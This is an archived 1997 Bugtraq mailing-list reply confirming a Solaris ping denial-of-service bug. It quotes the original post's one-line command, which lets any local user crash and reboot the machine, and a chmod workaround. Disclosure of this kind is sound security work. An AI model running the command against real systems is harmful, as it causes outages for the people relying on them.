[4807] in bugtraq

Re: Solaris Ping bug (DoS)

daemon@ATHENA.MIT.EDU (just me.)
Thu Jun 26 15:00:20 1997

Date: 	Thu, 26 Jun 1997 19:12:38 +0900
Reply-To: matt@bikkle.iac.co.jp
From: "just me." <matt@BIKKLE.IAC.CO.JP>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <19970626000829.28333@atl.eni.net>

Works on my box-

SunOS myhost 5.5.1 Generic_103640-08 sun4m sparc SUNW,SPARCstation-20

-r-sr-xr-x   1 root     bin        18172 May  3  1996 /usr/sbin/ping

instant panic and reboot.

On Thu, 26 Jun 1997, Adam Caldwell wrote:

> I briefly searched the bugtraq archives and didn't see this one, so here's a
> way to reboot a Solaris box, and is exploitable by anyone with an account on
> the system since ping is setuid root.
>
> ping -sv -i 127.0.0.1 224.0.0.1
>
> On Solaris 2.5, causes the machine to reboot (personal experience).  I've
> had independent reports of it crashing 2.5.1, and 2.5 (x86).  It probably works
> on all versions of Solaris.
>
> To "fix" the denial of service:
> chmod go-x /usr/sbin/ping
> if you don't mind disabling Ping on your system.



--matt@bikkle.iac.co.jp--(MG406)-------------------------------------------
  Technical Operations                  "This is a truly bogus example."
  Internet Access Center Tokyo, Japan         -The Bat book, p.506
